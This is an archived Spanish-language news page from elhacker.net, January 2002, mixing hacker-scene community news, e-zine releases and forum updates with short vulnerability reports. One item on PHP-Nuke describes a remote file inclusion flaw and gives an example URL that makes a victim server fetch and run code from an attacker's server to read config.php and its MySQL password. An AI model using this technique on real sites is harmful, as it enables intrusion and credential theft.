Una semana algo movida.
Noticia enviada el Miércoles 30 de Enero de 2002 por alex
"La Taberna de VanHackez" sigue off-line, la gente de FYE (350cc) abandonan y para colmo el webmaster principal de "Los Primeros Pasos de un Hacker" (GuST), también lo deja, aunque la web seguirá on-line y la llevará otra persona.
Una pena estas "bajas", pero bueno, desearles lo mejor para ellos.
Saludos,
webmaster de elhacker.net
Grave fallo de seguridad en phpnuke
Noticia enviada el Martes 29 de Enero de 2002 por Darknes
Un nuevo fallo de seguridad se ha encontrado en todas las versiones de PhpNuke ( Phpnuke.org ). Este le permite al atacante ejecutar comandos en el servidor ajeno mediante el archivo index.php?file=.
Este fallo fue encontrado por un usuario y publicado en BugTraq, despues fue reescrito para que funcionara bien por inteegrandes del grupo Systat Seguridad.
Basta con subir al servidor malicioso un determinado fichero (que podria tener llamadas a ejecutar comandos) para, asi, ejecutarlo desde nuestro browser en el servidor victima y lograr que este lo ejecute.
EJEMPLO: yo pongo en mi servidor el archivo test.txt, luego ejecuto en mi browser Http://www.servidor-victima.com.es/index.php?file=http://www.mi-servidor.com.es/text.txt y en el archivco .txt puedo pedir que haga un cat config.php (me mostrara el contenido del archivo config.php, donde se guarda la clave del MySQL).
Dias despues de que PhpNuke saco el parche para esta falla, nuevamente el grupo Systat Seguridad encontro una variante. En la pagina web del grupo se encontra la solucion para el bug, presentando 3 soluciones para arreglarala.
Fuente: www.systat.cl
www.350cc.com cierran :(
Noticia enviada el Viernes 25 de Enero de 2002 por alex
Esto se puede leer en su página web:
"No desapareceremos del todo. Alli estaremos creyendo firmemente en la libertad de informacion, la proteccion de la privacidad y la curiosidad genuina. Y continuaremos resguardando el legitimo derecho de defendernos, protestar y levantar la voz cuando alguno de estos conceptos sean pisoteados."
Un saludo a todos y mis deseos que todo les vaya bien :)
Y recuerdos especiales para un ex-miembro de 350cc (que ya ni recuerdo su nick) con el que mantenía contacto en el IRC y no sé nada de él, desde hace más de 1 año o más.
Suerte a todos.
Fuente de la Noticia 0ri0n Team Venezuela
Grave fallo de seguridad en routers de ADSL de Telefónica
Noticia enviada el Jueves 24 de Enero de 2002 por alex
El software 2.2.1 (9R1) de routers Efficient SpeedStream 5660 de ADSL instalados por Telefónica y Terra sufren una grave vulnerabilidad, según ha informado el ISI, Instituto para la Seguridad en Internet. Entre las acciones que, según han comprobado los expertos del ISI, un intruso podría llevar a cabo, se incluirían:
- Desconfiguración total y permanente del router.
- Inhabilitación permanente del acceso a Internet mediante este router.
- Redirección de puertos a máquinas internas, que haría visibles a éstas desde Internet.
Fuente de la Noticia
Ezine: 7a69 Número #13
Noticia enviada el Domingo 20 de Enero de 2002 por alex
Salió el 13 del e-zine de 7a69 :)
Bajar e-zine
Verlo on-line
Fallo PHP-Nuke
Noticia enviada el Viernes 18 de Enero de 2002 por alex
Para variar un nuevo bug en los sistemas basados en PHP-Nuke.
Leer Fallo
NetSearch Ezine #7
Noticia enviada el Martes 15 de Enero de 2002 por alex
Aunque con retraso ya salió el 31/12/01. Perdón por no haberlo puesto antes, pero por diversas razones no me acordé.
Bajar NetSerach 7
Visitar web NetSearch
Posible Vulnerabilidad en IE 5.5 y 6.0
Noticia enviada el Martes 15 de Enero de 2002 por alex
La noticia está en inglés, pero es intersante hecharle un vistazo.
Noticia en NewOrder
Foro mucho más rápido
Noticia enviada el Martes 15 de Enero de 2002 por alex
El foro ya está on-line definitvamente y hospedado en un "pequeño" Athlon a 1,3 con 1 GB de RAM, gentileza del colega bandido.
Se ha aumentado la velocidad del foro, ya que antes iba extremadamente lento, y ahora es todo el contrario. Esto se debia a pequeños problemas de conexión entre el PHP y el MySQL.
Ver Foro
MercadoLibre.com cierra programa de Afiliados
Noticia enviada el Viernes 11 de Enero de 2002 por alex
Importante para todos los webmasters:
MercadoLibre.com cierra su programa de afiliados desde el dia 9 de Enero.
Todos los que tengais banners ya sabeis, a quitarlos....
Se os pagará el dinero acumulado hasta el día 9 de Enero enviando una carta a MercadoLibre.com
+ Info en MercadoLibre.com
elhacker.net apunto de llegar al millón
Noticia enviada el Jueves 10 de Enero de 2002 por alex
elhacker.net está a punto de llegar a la "mágica" cifra de 1 millón de visitantes únicos.
Se está planteando muy seriamente la posibilidad de regalar una camisteta al visitante 1 millón, pero hay que mirar la manera de averiguar quién es esa persona.
De momento se superan las 950.000 visitas únicas.
Gracias a todos por confiar en elhacker.net
Saludos,
Alex :)
Nace HispaShell.com
Noticia enviada el Miércoles 9 de Enero de 2002 por alex
El primer Proveedor de Shells Español con soporte en Español.
Conectado las 24 horas del día, 7 días por semana.
Podrás tener tu propia cuenta con acceso a: TELNET, SSH, POP3, FTP, WEB, BitchX, ircII, pine, epic, etc....
Sin límite de transferencia.
Con un servicio técnico de 24 horas via EMAIL o via CHAT.
Con paquetes precompilados de EZBounce, BNC, EGGdrop ...
» Servidor: FreeBSD
» Velocidad: 100 Mbps
» IPs: 20 [Vhosts]
Visitar HispaShell.com
Nuevo Foro ESTABLE
Noticia enviada el Lunes 7 de Enero de 2002 por alex
Holas,
Por fín, el foro está alojado en un ordenador conectado las 24/h del dia, gentileza de bandido. Se trata de Linux RedHat con conexión ADSL.
Quizás el foro vaya un poco lento, porque esta máquina ejecuta un servidor ircd, un servidor edonkey, el MySQL del foro, etc, etc.
El PHP y HTML se ejecuta en elhacker.net pero las bases de datos MySQL están en el PC de bandido.
Visitar Foro
(Más cosas: Muy pronto una nueva empresa de Shells 100% española con servidor FreeBSD está a punto de abrir con muy buen servicio, calidad y precios más que aceptables. Os informaré próximamante.
Kriptopolis.com otra vez on-line
Noticia enviada el Viernes 4 de Enero de 2002 por alex
Pos eso.
Visitar Kriptopolis.com
Colaboraciones con kSh Security Team
Noticia enviada el Jueves 3 de Enero de 2002 por alex
Bueno, pues uno de los amigos de #HackersEspaña de DALnet, NiEtZsChE-2k, se une al e-zine kSh. Así que espero colaborar con kSh Security Team con intercambio de enlaces y alguna otra cosilla más.
Saludos al staff del kSh y en especial a NiEtZsChE-2k.
Visitar web kSh
El servicio redireccionador Es.Fm (dominios) ha sido temporalmente desactivado
Noticia enviada el Miércoles 2 de Enero de 2002 por alex
El servicio redireccionador Es.Fm (dominios) ha sido temporalmente desactivado, debido a los constantes "ataques" que su servidor recibe.
Eliminación del servicio "redireccionador" (02/01/2001)
Ver Info Completa
Web conrta el "Expire" de Hispano
Noticia enviada el Martes 1 de Enero de 2002 por alex
Si eres usuario del IRC del Irc-Hispano esto te intersará:
http://www.noexpire.cjb.net
¿De que va todo esto ?
<_STB_> al guien me esplica k es el NoExpire
<_STB_> ¿¿?¿?
<[-DaViS-]> pues
<[-DaViS-]> pagar por crear canales
<[-DaViS-]> y
<[-DaViS-]> el nick caduca si no lo utilizas en 20 dias, pues si kieres k no te caduke tienes k pagar tb
<[-DaViS-]> y lo de los nicks tb
www.kriptopolis.com off-line por unos días...
Noticia enviada el Martes 1 de Enero de 2002 por alex
KRIPTÓPOLIS
Nuestro anunciado traslado se está completando y ya estamos construyendo Kriptópolis en este nuevo emplazamiento.
Hasta que se complete la reinstalación el acceso estará protegido por contraseña. Esta protección es, por tanto, temporal y su contraseña no coincide con la de ciudadano de Kriptópolis. Cuando el web esté disponible, el acceso será tan libre como siempre.
Mientras tanto, Feliz Año a todos.
A ver si vuelven pronto....
Perl para windows
Noticia enviada el Martes 1 de Enero de 2002 por alex
Para poder usar scripts perl y cgi's bajo windows.
Active Perl 5.6.1 12 MB.
Gracias a Cyrano por la info.
Heineken Team